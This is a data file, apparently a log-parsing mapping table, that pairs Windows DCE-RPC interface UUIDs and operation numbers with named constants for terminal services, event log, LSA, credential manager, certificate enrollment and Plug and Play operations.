5ca4a760-ebb1-11cf-8611-00a0245420ed:50 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_GET_INTERNET_CONNECTOR_STATUS
5ca4a760-ebb1-11cf-8611-00a0245420ed:51 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_SET_INTERNET_CONNECTOR_STATUS
5ca4a760-ebb1-11cf-8611-00a0245420ed:52 XDM_CONST.DCERPC_OPERATION_RPC_SERVER_QUERY_INET_CONNECTOR_INFORMATION
5ca4a760-ebb1-11cf-8611-00a0245420ed:53 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_LAN_ADAPTER_NAME
5ca4a760-ebb1-11cf-8611-00a0245420ed:54 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UPDATE_USER_CONFIG
5ca4a760-ebb1-11cf-8611-00a0245420ed:55 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_QUERY_LOGON_CREDENTIALS
5ca4a760-ebb1-11cf-8611-00a0245420ed:56 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_REGISTER_CONSOLE_NOTIFICATION
5ca4a760-ebb1-11cf-8611-00a0245420ed:57 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UN_REGISTER_CONSOLE_NOTIFICATION
5ca4a760-ebb1-11cf-8611-00a0245420ed:58 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UPDATE_SETTINGS
5ca4a760-ebb1-11cf-8611-00a0245420ed:59 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SHADOW_STOP
5ca4a760-ebb1-11cf-8611-00a0245420ed:60 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CLOSE_SERVER_EX
5ca4a760-ebb1-11cf-8611-00a0245420ed:61 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_IS_HELP_ASSISTANT_SESSION
Original Mapped Description
5ca4a760-ebb1-11cf-8611-00a0245420ed:62 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_MACHINE_POLICY
5ca4a760-ebb1-11cf-8611-00a0245420ed:63 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UPDATE_CLIENT_CACHED_CREDENTIALS
5ca4a760-ebb1-11cf-8611-00a0245420ed:64 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_FUS_CAN_REMOTE_USER_DISCONNECT
5ca4a760-ebb1-11cf-8611-00a0245420ed:65 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CHECK_LOOP_BACK
5ca4a760-ebb1-11cf-8611-00a0245420ed:66 XDM_CONST.DCERPC_OPERATION_RPC_CONNECT_CALLBACK
5ca4a760-ebb1-11cf-8611-00a0245420ed:67 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_NOTIFY_DISCONNECT_PIPE
5ca4a760-ebb1-11cf-8611-00a0245420ed:68 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_SESSION_INITIALIZED
5ca4a760-ebb1-11cf-8611-00a0245420ed:69 XDM_CONST.DCERPC_OPERATION_RPC_REMOTE_ASSISTANCE_PREPARE_SYSTEM_RESTORE
5ca4a760-ebb1-11cf-8611-00a0245420ed:70 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_GET_ALL_PROCESSES_NT6
5ca4a760-ebb1-11cf-8611-00a0245420ed:71 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_REGISTER_NOTIFICATION_EVENT
5ca4a760-ebb1-11cf-8611-00a0245420ed:72 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_UN_REGISTER_NOTIFICATION_EVENT
5ca4a760-ebb1-11cf-8611-00a0245420ed:73 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_AUTO_RECONNECT
5ca4a760-ebb1-11cf-8611-00a0245420ed:74 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_CHECK_ACCESS
5ca4a760-ebb1-11cf-8611-00a0245420ed:75 XDM_CONST.DCERPC_OPERATION_RPC_WIN_STATION_OPEN_SESSION_DIRECTORY
d6d70ef0-0e3b-11cb-acc3-08002b1d29c3:0 XDM_CONST.DCERPC_OPERATION_NSIBINDINGEXPORT
d6d70ef0-0e3b-11cb-acc3-08002b1d29c3:1 XDM_CONST.DCERPC_OPERATION_NSIBINDINGUNEXPORT
d3fbb514-0e3b-11cb-8fad-08002b1d29c3:0 XDM_CONST.DCERPC_OPERATION_NSIBINDINGLOOKUPBEGIN
d3fbb514-0e3b-11cb-8fad-08002b1d29c3:1 XDM_CONST.DCERPC_OPERATION_NSIBINDINGLOOKUPDONE
d3fbb514-0e3b-11cb-8fad-08002b1d29c3:2 XDM_CONST.DCERPC_OPERATION_NSIBINDINGLOOKUPNEXT
d3fbb514-0e3b-11cb-8fad-08002b1d29c3:3 XDM_CONST.DCERPC_OPERATION_NSIMGMTHANDLESETEXPAGE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:0 XDM_CONST.DCERPC_OPERATION_NSIGROUPDELETE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:1 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRADD
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:2 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRREMOVE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:3 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRINQBEGIN
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:4 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRINQNEXT
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:5 XDM_CONST.DCERPC_OPERATION_NSIGROUPMBRINQDONE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:6 XDM_CONST.DCERPC_OPERATION_NSIPROFILEDELETE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:7 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTADD
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:8 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTREMOVE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:9 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTINQBEGIN
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:10 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTINQNEXT
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:11 XDM_CONST.DCERPC_OPERATION_NSIPROFILEELTINQDONE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:12 XDM_CONST.DCERPC_OPERATION_NSIENTRYOBJECTINQBEGIN
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:13 XDM_CONST.DCERPC_OPERATION_NSIENTRYOBJECTINQNEXT
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:14 XDM_CONST.DCERPC_OPERATION_NSIENTRYOBJECTINQDONE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:15 XDM_CONST.DCERPC_OPERATION_NSIENTRYEXPANDNAME
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:16 XDM_CONST.DCERPC_OPERATION_NSIMGMTBINDINGUNEXPORT
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:17 XDM_CONST.DCERPC_OPERATION_NSIMGMTENTRYDELETE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:18 XDM_CONST.DCERPC_OPERATION_NSIMGMTENTRYCREATE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:19 XDM_CONST.DCERPC_OPERATION_NSIMGMTENTRYINQIFIDS
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:20 XDM_CONST.DCERPC_OPERATION_NSIMGMTINQEXPAGE
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:21 XDM_CONST.DCERPC_OPERATION_NSIMGMTINQSETAGE
82273fdc-e32a-18c3-3f78-827929dc23ea:0 XDM_CONST.DCERPC_OPERATION_ELFR_CLEAR_ELFW
82273fdc-e32a-18c3-3f78-827929dc23ea:1 XDM_CONST.DCERPC_OPERATION_ELFR_BACKUP_ELFW
82273fdc-e32a-18c3-3f78-827929dc23ea:2 XDM_CONST.DCERPC_OPERATION_ELFR_CLOSE_EL
82273fdc-e32a-18c3-3f78-827929dc23ea:3 XDM_CONST.DCERPC_OPERATION_ELFR_DEREGISTER_EVENT_SOURCE
82273fdc-e32a-18c3-3f78-827929dc23ea:4 XDM_CONST.DCERPC_OPERATION_ELFR_NUMBER_OF_RECORDS
82273fdc-e32a-18c3-3f78-827929dc23ea:5 XDM_CONST.DCERPC_OPERATION_ELFR_OLDEST_RECORD
82273fdc-e32a-18c3-3f78-827929dc23ea:6 XDM_CONST.DCERPC_OPERATION_ELFR_CHANGE_NOTIFY
82273fdc-e32a-18c3-3f78-827929dc23ea:7 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_ELW
82273fdc-e32a-18c3-3f78-827929dc23ea:8 XDM_CONST.DCERPC_OPERATION_ELFR_REGISTER_EVENT_SOURCE_W
82273fdc-e32a-18c3-3f78-827929dc23ea:9 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_BELW
82273fdc-e32a-18c3-3f78-827929dc23ea:10 XDM_CONST.DCERPC_OPERATION_ELFR_READ_ELW
82273fdc-e32a-18c3-3f78-827929dc23ea:11 XDM_CONST.DCERPC_OPERATION_ELFR_REPORT_EVENT_W
82273fdc-e32a-18c3-3f78-827929dc23ea:12 XDM_CONST.DCERPC_OPERATION_ELFR_CLEAR_ELFA
82273fdc-e32a-18c3-3f78-827929dc23ea:13 XDM_CONST.DCERPC_OPERATION_ELFR_BACKUP_ELFA
82273fdc-e32a-18c3-3f78-827929dc23ea:14 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_ELA
82273fdc-e32a-18c3-3f78-827929dc23ea:15 XDM_CONST.DCERPC_OPERATION_ELFR_REGISTER_EVENT_SOURCE_A
82273fdc-e32a-18c3-3f78-827929dc23ea:16 XDM_CONST.DCERPC_OPERATION_ELFR_OPEN_BELA
82273fdc-e32a-18c3-3f78-827929dc23ea:17 XDM_CONST.DCERPC_OPERATION_ELFR_READ_ELA
82273fdc-e32a-18c3-3f78-827929dc23ea:18 XDM_CONST.DCERPC_OPERATION_ELFR_REPORT_EVENT_A
82273fdc-e32a-18c3-3f78-827929dc23ea:19 XDM_CONST.DCERPC_OPERATION_ELFR_REGISTER_CLUSTER_SVC
82273fdc-e32a-18c3-3f78-827929dc23ea:20 XDM_CONST.DCERPC_OPERATION_ELFR_DEREGISTER_CLUSTER_SVC
82273fdc-e32a-18c3-3f78-827929dc23ea:21 XDM_CONST.DCERPC_OPERATION_ELFR_WRITE_CLUSTER_EVENTS
82273fdc-e32a-18c3-3f78-827929dc23ea:22 XDM_CONST.DCERPC_OPERATION_ELFR_GET_LOG_INFORMATION
82273fdc-e32a-18c3-3f78-827929dc23ea:23 XDM_CONST.DCERPC_OPERATION_ELFR_FLUSH_EL
82273fdc-e32a-18c3-3f78-827929dc23ea:24 XDM_CONST.DCERPC_OPERATION_ELFR_REPORT_EVENT_AND_SOURCE_W
12b81e99-f207-4a4c-85d3-77b42f76fd14:0 XDM_CONST.DCERPC_OPERATION_SECL_CREATE_PROCESS_WITH_LOGON_W
12b81e99-f207-4a4c-85d3-77b42f76fd14:1 XDM_CONST.DCERPC_OPERATION_SECL_CREATE_PROCESS_WITH_LOGON_EX_W
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:0 XDM_CONST.DCERPC_OPERATION_KEYR_OPEN_KEY_SERVICE
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:1 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_PROVIDERS
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:2 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_PROVIDER_TYPES
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:3 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_PROV_CONTAINERS
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:4 XDM_CONST.DCERPC_OPERATION_KEYR_CLOSE_KEY_SERVICE
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:5 XDM_CONST.DCERPC_OPERATION_KEYR_GET_DEFAULT_PROVIDER
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:6 XDM_CONST.DCERPC_OPERATION_KEYR_SET_DEFAULT_PROVIDER
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:7 XDM_CONST.DCERPC_OPERATION_KEYR_ENROLL
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:8 XDM_CONST.DCERPC_OPERATION_KEYR_EXPORT_CERT
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:9 XDM_CONST.DCERPC_OPERATION_KEYR_IMPORT_CERT
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:10 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_AVAILABLE_CERT_TYPES
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:11 XDM_CONST.DCERPC_OPERATION_KEYR_ENUMERATE_C_AS
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:12 XDM_CONST.DCERPC_OPERATION_KEYR_ENROLL_V2
8d0ffe72-d252-11d0-bf8f-00c04fd9126b:13 XDM_CONST.DCERPC_OPERATION_KEYR_QUERY_REQUEST_STATUS
68b58241-c259-4f03-a2e5-a2651dcbc930:0 XDM_CONST.DCERPC_OPERATION_K_SR_SUBMIT_REQUEST
68b58241-c259-4f03-a2e5-a2651dcbc930:1 XDM_CONST.DCERPC_OPERATION_K_SR_GET_TEMPLATES
68b58241-c259-4f03-a2e5-a2651dcbc930:2 XDM_CONST.DCERPC_OPERATION_K_SR_GET_C_AS
0d72a7d4-6148-11d1-b4aa-00c04fb66ea0:0 XDM_CONST.DCERPC_OPERATION_SS_CERT_PROTECT_FUNCTION
f50aac00-c7f3-428e-a022-a6b71bfb9d43:0 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_ADD_CATALOG
f50aac00-c7f3-428e-a022-a6b71bfb9d43:1 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_DELETE_CATALOG
f50aac00-c7f3-428e-a022-a6b71bfb9d43:2 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_ENUM_CATALOGS
f50aac00-c7f3-428e-a022-a6b71bfb9d43:3 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_REGISTER_FOR_CHANGE_NOTIFICATION
f50aac00-c7f3-428e-a022-a6b71bfb9d43:4 XDM_CONST.DCERPC_OPERATION_KEYR_CLOSE_KEY_SERVICE
f50aac00-c7f3-428e-a022-a6b71bfb9d43:5 XDM_CONST.DCERPC_OPERATION_SS_CAT_DB_REBUILD_DATABASE
12345778-1234-abcd-ef00-0123456789ab:0 XDM_CONST.DCERPC_OPERATION_LSAR_CLOSE
12345778-1234-abcd-ef00-0123456789ab:1 XDM_CONST.DCERPC_OPERATION_LSAR_DELETE
12345778-1234-abcd-ef00-0123456789ab:2 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_PRIVILEGES
12345778-1234-abcd-ef00-0123456789ab:3 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_SECURITY_OBJECT
12345778-1234-abcd-ef00-0123456789ab:4 XDM_CONST.DCERPC_OPERATION_LSAR_SET_SECURITY_OBJECT
12345778-1234-abcd-ef00-0123456789ab:5 XDM_CONST.DCERPC_OPERATION_LSAR_CHANGE_PASSWORD
12345778-1234-abcd-ef00-0123456789ab:6 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_POLICY
12345778-1234-abcd-ef00-0123456789ab:7 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_INFORMATION_POLICY
12345778-1234-abcd-ef00-0123456789ab:8 XDM_CONST.DCERPC_OPERATION_LSAR_SET_INFORMATION_POLICY
12345778-1234-abcd-ef00-0123456789ab:9 XDM_CONST.DCERPC_OPERATION_LSAR_CLEAR_AUDIT_LOG
12345778-1234-abcd-ef00-0123456789ab:10 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:11 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_ACCOUNTS
12345778-1234-abcd-ef00-0123456789ab:12 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_TRUSTED_DOMAIN
12345778-1234-abcd-ef00-0123456789ab:13 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_TRUSTED_DOMAINS
12345778-1234-abcd-ef00-0123456789ab:14 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES
12345778-1234-abcd-ef00-0123456789ab:15 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_SIDS
12345778-1234-abcd-ef00-0123456789ab:16 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_SECRET
12345778-1234-abcd-ef00-0123456789ab:17 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:18 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_PRIVILEGES_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:19 XDM_CONST.DCERPC_OPERATION_LSAR_ADD_PRIVILEGES_TO_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:20 XDM_CONST.DCERPC_OPERATION_LSAR_REMOVE_PRIVILEGES_FROM_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:21 XDM_CONST.DCERPC_OPERATION_LSAR_GET_QUOTAS_FOR_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:22 XDM_CONST.DCERPC_OPERATION_LSAR_SET_QUOTAS_FOR_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:23 XDM_CONST.DCERPC_OPERATION_LSAR_GET_SYSTEM_ACCESS_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:24 XDM_CONST.DCERPC_OPERATION_LSAR_SET_SYSTEM_ACCESS_ACCOUNT
12345778-1234-abcd-ef00-0123456789ab:25 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_TRUSTED_DOMAIN
12345778-1234-abcd-ef00-0123456789ab:26 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_INFO_TRUSTED_DOMAIN
12345778-1234-abcd-ef00-0123456789ab:27 XDM_CONST.DCERPC_OPERATION_LSAR_SET_INFORMATION_TRUSTED_DOMAIN
12345778-1234-abcd-ef00-0123456789ab:28 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_SECRET
12345778-1234-abcd-ef00-0123456789ab:29 XDM_CONST.DCERPC_OPERATION_LSAR_SET_SECRET
12345778-1234-abcd-ef00-0123456789ab:30 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_SECRET
12345778-1234-abcd-ef00-0123456789ab:31 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_PRIVILEGE_VALUE
12345778-1234-abcd-ef00-0123456789ab:32 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_PRIVILEGE_NAME
12345778-1234-abcd-ef00-0123456789ab:33 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_PRIVILEGE_DISPLAY_NAME
12345778-1234-abcd-ef00-0123456789ab:34 XDM_CONST.DCERPC_OPERATION_LSAR_DELETE_OBJECT
12345778-1234-abcd-ef00-0123456789ab:35 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_ACCOUNTS_WITH_USER_RIGHT
12345778-1234-abcd-ef00-0123456789ab:36 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_ACCOUNT_RIGHTS
12345778-1234-abcd-ef00-0123456789ab:37 XDM_CONST.DCERPC_OPERATION_LSAR_ADD_ACCOUNT_RIGHTS
12345778-1234-abcd-ef00-0123456789ab:38 XDM_CONST.DCERPC_OPERATION_LSAR_REMOVE_ACCOUNT_RIGHTS
12345778-1234-abcd-ef00-0123456789ab:39 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_TRUSTED_DOMAIN_INFO
12345778-1234-abcd-ef00-0123456789ab:40 XDM_CONST.DCERPC_OPERATION_LSAR_SET_TRUSTED_DOMAIN_INFO
12345778-1234-abcd-ef00-0123456789ab:41 XDM_CONST.DCERPC_OPERATION_LSAR_DELETE_TRUSTED_DOMAIN
12345778-1234-abcd-ef00-0123456789ab:42 XDM_CONST.DCERPC_OPERATION_LSAR_STORE_PRIVATE_DATA
12345778-1234-abcd-ef00-0123456789ab:43 XDM_CONST.DCERPC_OPERATION_LSAR_RETRIEVE_PRIVATE_DATA
12345778-1234-abcd-ef00-0123456789ab:44 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_POLICY2
12345778-1234-abcd-ef00-0123456789ab:45 XDM_CONST.DCERPC_OPERATION_LSAR_GET_USER_NAME
12345778-1234-abcd-ef00-0123456789ab:46 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_INFORMATION_POLICY2
12345778-1234-abcd-ef00-0123456789ab:47 XDM_CONST.DCERPC_OPERATION_LSAR_SET_INFORMATION_POLICY2
12345778-1234-abcd-ef00-0123456789ab:48 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_TRUSTED_DOMAIN_INFO_BY_NAME
12345778-1234-abcd-ef00-0123456789ab:49 XDM_CONST.DCERPC_OPERATION_LSAR_SET_TRUSTED_DOMAIN_INFO_BY_NAME
12345778-1234-abcd-ef00-0123456789ab:50 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_TRUSTED_DOMAINS_EX
12345778-1234-abcd-ef00-0123456789ab:51 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_TRUSTED_DOMAIN_EX
12345778-1234-abcd-ef00-0123456789ab:52 XDM_CONST.DCERPC_OPERATION_LSAR_CLOSE_TRUSTED_DOMAIN_EX
12345778-1234-abcd-ef00-0123456789ab:53 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_DOMAIN_INFORMATION_POLICY
12345778-1234-abcd-ef00-0123456789ab:54 XDM_CONST.DCERPC_OPERATION_LSAR_SET_DOMAIN_INFORMATION_POLICY
12345778-1234-abcd-ef00-0123456789ab:55 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_TRUSTED_DOMAIN_BY_NAME
12345778-1234-abcd-ef00-0123456789ab:56 XDM_CONST.DCERPC_OPERATION_LSAR_TEST_CALL
12345778-1234-abcd-ef00-0123456789ab:57 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_SIDS2
12345778-1234-abcd-ef00-0123456789ab:58 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES2
12345778-1234-abcd-ef00-0123456789ab:59 XDM_CONST.DCERPC_OPERATION_LSAR_CREATE_TRUSTED_DOMAIN_EX2
12345778-1234-abcd-ef00-0123456789ab:60 XDM_CONST.DCERPC_OPERATION_CREDR_WRITE
12345778-1234-abcd-ef00-0123456789ab:61 XDM_CONST.DCERPC_OPERATION_CREDR_READ
12345778-1234-abcd-ef00-0123456789ab:62 XDM_CONST.DCERPC_OPERATION_CREDR_ENUMERATE
12345778-1234-abcd-ef00-0123456789ab:63 XDM_CONST.DCERPC_OPERATION_CREDR_WRITE_DOMAIN_CREDENTIALS
12345778-1234-abcd-ef00-0123456789ab:64 XDM_CONST.DCERPC_OPERATION_CREDR_READ_DOMAIN_CREDENTIALS
12345778-1234-abcd-ef00-0123456789ab:65 XDM_CONST.DCERPC_OPERATION_CREDR_DELETE
12345778-1234-abcd-ef00-0123456789ab:66 XDM_CONST.DCERPC_OPERATION_CREDR_GET_TARGET_INFO
12345778-1234-abcd-ef00-0123456789ab:67 XDM_CONST.DCERPC_OPERATION_CREDR_PROFILE_LOADED
12345778-1234-abcd-ef00-0123456789ab:68 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES3
12345778-1234-abcd-ef00-0123456789ab:69 XDM_CONST.DCERPC_OPERATION_CREDR_GET_SESSION_TYPES
12345778-1234-abcd-ef00-0123456789ab:70 XDM_CONST.DCERPC_OPERATION_LSAR_REGISTER_AUDIT_EVENT
12345778-1234-abcd-ef00-0123456789ab:71 XDM_CONST.DCERPC_OPERATION_LSAR_GEN_AUDIT_EVENT
12345778-1234-abcd-ef00-0123456789ab:72 XDM_CONST.DCERPC_OPERATION_LSAR_UNREGISTER_AUDIT_EVENT
12345778-1234-abcd-ef00-0123456789ab:73 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_FOREST_TRUST_INFORMATION
12345778-1234-abcd-ef00-0123456789ab:74 XDM_CONST.DCERPC_OPERATION_LSAR_SET_FOREST_TRUST_INFORMATION
12345778-1234-abcd-ef00-0123456789ab:75 XDM_CONST.DCERPC_OPERATION_CREDR_RENAME
12345778-1234-abcd-ef00-0123456789ab:76 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_SIDS3
12345778-1234-abcd-ef00-0123456789ab:77 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_NAMES4
12345778-1234-abcd-ef00-0123456789ab:78 XDM_CONST.DCERPC_OPERATION_LSAR_OPEN_POLICY_SCE
12345778-1234-abcd-ef00-0123456789ab:79 XDM_CONST.DCERPC_OPERATION_LSAR_ADT_REGISTER_SECURITY_EVENT_SOURCE
12345778-1234-abcd-ef00-0123456789ab:80 XDM_CONST.DCERPC_OPERATION_LSAR_ADT_UNREGISTER_SECURITY_EVENT_SOURCE
12345778-1234-abcd-ef00-0123456789ab:81 XDM_CONST.DCERPC_OPERATION_LSAR_ADT_REPORT_SECURITY_EVENT
12345778-1234-abcd-ef00-0123456789ab:82 XDM_CONST.DCERPC_OPERATION_CREDR_FIND_BEST_CREDENTIAL
12345778-1234-abcd-ef00-0123456789ab:83 XDM_CONST.DCERPC_OPERATION_LSAR_SET_AUDIT_POLICY
12345778-1234-abcd-ef00-0123456789ab:84 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_AUDIT_POLICY
12345778-1234-abcd-ef00-0123456789ab:85 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_AUDIT_POLICY
12345778-1234-abcd-ef00-0123456789ab:86 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_AUDIT_CATEGORIES
12345778-1234-abcd-ef00-0123456789ab:87 XDM_CONST.DCERPC_OPERATION_LSAR_ENUMERATE_AUDIT_SUB_CATEGORIES
12345778-1234-abcd-ef00-0123456789ab:88 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_AUDIT_CATEGORY_NAME
12345778-1234-abcd-ef00-0123456789ab:89 XDM_CONST.DCERPC_OPERATION_LSAR_LOOKUP_AUDIT_SUB_CATEGORY_NAME
12345778-1234-abcd-ef00-0123456789ab:90 XDM_CONST.DCERPC_OPERATION_LSAR_SET_AUDIT_SECURITY
12345778-1234-abcd-ef00-0123456789ab:91 XDM_CONST.DCERPC_OPERATION_LSAR_QUERY_AUDIT_SECURITY
12345778-1234-abcd-ef00-0123456789ab:92 XDM_CONST.DCERPC_OPERATION_CRED_READ_BY_TOKEN_HANDLE
12345778-1234-abcd-ef00-0123456789ab:93 XDM_CONST.DCERPC_OPERATION_CREDR_RESTORE_CREDENTIALS
12345778-1234-abcd-ef00-0123456789ab:94 XDM_CONST.DCERPC_OPERATION_CREDR_BACKUP_CREDENTIALS
17fdd703-1827-4e34-79d4-24a55c53bb37:0 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_ADD
17fdd703-1827-4e34-79d4-24a55c53bb37:1 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_ENUM
17fdd703-1827-4e34-79d4-24a55c53bb37:2 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_GET_INFO
17fdd703-1827-4e34-79d4-24a55c53bb37:3 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_NAME_DEL
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc:0 XDM_CONST.DCERPC_OPERATION_NETR_SEND_MESSAGE
8d9f4e40-a03d-11ce-8f69-08003e30051b:0 XDM_CONST.DCERPC_OPERATION_PNP_DISCONNECT
8d9f4e40-a03d-11ce-8f69-08003e30051b:1 XDM_CONST.DCERPC_OPERATION_PNP_CONNECT
8d9f4e40-a03d-11ce-8f69-08003e30051b:2 XDM_CONST.DCERPC_OPERATION_PNP_GET_VERSION
8d9f4e40-a03d-11ce-8f69-08003e30051b:3 XDM_CONST.DCERPC_OPERATION_PNP_GET_GLOBAL_STATE
8d9f4e40-a03d-11ce-8f69-08003e30051b:4 XDM_CONST.DCERPC_OPERATION_PNP_INIT_DETECTION
8d9f4e40-a03d-11ce-8f69-08003e30051b:5 XDM_CONST.DCERPC_OPERATION_PNP_REPORT_LOG_ON
8d9f4e40-a03d-11ce-8f69-08003e30051b:6 XDM_CONST.DCERPC_OPERATION_PNP_VALIDATE_DEVICE_INSTANCE
8d9f4e40-a03d-11ce-8f69-08003e30051b:7 XDM_CONST.DCERPC_OPERATION_PNP_GET_ROOT_DEVICE_INSTANCE
8d9f4e40-a03d-11ce-8f69-08003e30051b:8 XDM_CONST.DCERPC_OPERATION_PNP_GET_RELATED_DEVICE_INSTANCE
8d9f4e40-a03d-11ce-8f69-08003e30051b:9 XDM_CONST.DCERPC_OPERATION_PNP_ENUMERATE_SUB_KEYS
8d9f4e40-a03d-11ce-8f69-08003e30051b:10 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_LIST
8d9f4e40-a03d-11ce-8f69-08003e30051b:11 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEVICE_LIST_SIZE
8d9f4e40-a03d-11ce-8f69-08003e30051b:12 XDM_CONST.DCERPC_OPERATION_PNP_GET_DEPTH
